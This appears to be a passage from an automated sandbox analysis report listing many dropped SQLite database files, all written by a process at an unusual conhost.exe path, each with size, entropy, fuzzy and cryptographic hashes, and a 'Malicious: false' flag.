                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.6732424250451717
                                                          Encrypted:false
                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):51200
                                                          Entropy (8bit):0.8745947603342119
                                                          Encrypted:false
                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5712781801655107
                                                          Encrypted:false
                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):51200
                                                          Entropy (8bit):0.8745947603342119
                                                          Encrypted:false
                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):51200
                                                          Entropy (8bit):0.8745947603342119
                                                          Encrypted:false
                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
Category: dropped
Size (bytes): 20480
Entropy (8bit): 0.8508558324143882
Encrypted: false
SSDEEP: 24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
MD5: 933D6D14518371B212F36C3835794D75
SHA1: 92D056D912B3C0260D379330D3CC0359B57A322B
SHA-256: 55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
SHA-512: EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
Malicious: false
Process: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category: dropped
Size (bytes): 20480
Entropy (8bit): 0.5712781801655107
Encrypted: false
SSDEEP: 12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5: 05A60B4620923FD5D53B9204391452AF
SHA1: DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256: 6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512: 068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious: false
Process: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category: dropped
Size (bytes): 106496
Entropy (8bit): 1.136471148832945
Encrypted: false
SSDEEP: 192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
MD5: 37B1FC046E4B29468721F797A2BB968D
SHA1: 50055EF1C50E4C1A7CCF7D00620E95128E4C448B
SHA-256: 7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
SHA-512: 1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
Malicious: false
Process: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category: dropped
Size (bytes): 40960
Entropy (8bit): 0.8553638852307782
Encrypted: false
SSDEEP: 48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5: 28222628A3465C5F0D4B28F70F97F482
SHA1: 1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256: 93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512: C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious: false
Process: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category: dropped
Size (bytes): 106496
Entropy (8bit): 1.136471148832945
Encrypted: false
SSDEEP: 192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
MD5: 37B1FC046E4B29468721F797A2BB968D
SHA1: 50055EF1C50E4C1A7CCF7D00620E95128E4C448B
SHA-256: 7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
SHA-512: 1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
Malicious: false
Process: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category: dropped
Size (bytes): 40960
Entropy (8bit): 0.8553638852307782
Encrypted: false
SSDEEP: 48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5: 28222628A3465C5F0D4B28F70F97F482
SHA1: 1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256: 93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512: C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious: false
Process: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.1239949490932863
Encrypted: false
SSDEEP: 384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5: 271D5F995996735B01672CF227C81C17
SHA1: 7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256: 9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512: 62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious: false
Process: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
Category: dropped
Size (bytes): 20480
Entropy (8bit): 0.8508558324143882
Encrypted: false
SSDEEP: 24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
MD5: 933D6D14518371B212F36C3835794D75
SHA1: 92D056D912B3C0260D379330D3CC0359B57A322B
SHA-256: 55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
SHA-512: EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
Malicious: false
Process: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
Category: dropped
Size (bytes): 51200
Entropy (8bit): 0.8745947603342119
Encrypted: false
SSDEEP: 96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
MD5: 378391FDB591852E472D99DC4BF837DA
SHA1: 10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
SHA-256: 513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
SHA-512: F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
Malicious: false
Process: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category: dropped
Size (bytes): 20480
Entropy (8bit): 0.6732424250451717
Encrypted: false
SSDEEP: 24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5: CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1: 3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256: EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512: 0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious: false
Process: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category: dropped
Size (bytes): 40960
Entropy (8bit): 0.8553638852307782
Encrypted: false
SSDEEP: 48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5: 28222628A3465C5F0D4B28F70F97F482
SHA1: 1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256: 93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512: C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious: false
Process: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
File Type: SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category: dropped
Size (bytes): 20480
Entropy (8bit): 0.5707520969659783
Encrypted: false
SSDEEP: 12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5: 9F6D153D934BCC50E8BC57E7014B201A
SHA1: 50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256: 2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512: B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious: false
Process: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
File Type: SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category: dropped
Size (bytes): 20480
Entropy (8bit): 0.5707520969659783
Encrypted: false
SSDEEP: 12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5: 9F6D153D934BCC50E8BC57E7014B201A
SHA1: 50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256: 2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512: B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious: false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5712781801655107
                                                          Encrypted:false
                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5707520969659783
                                                          Encrypted:false
                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
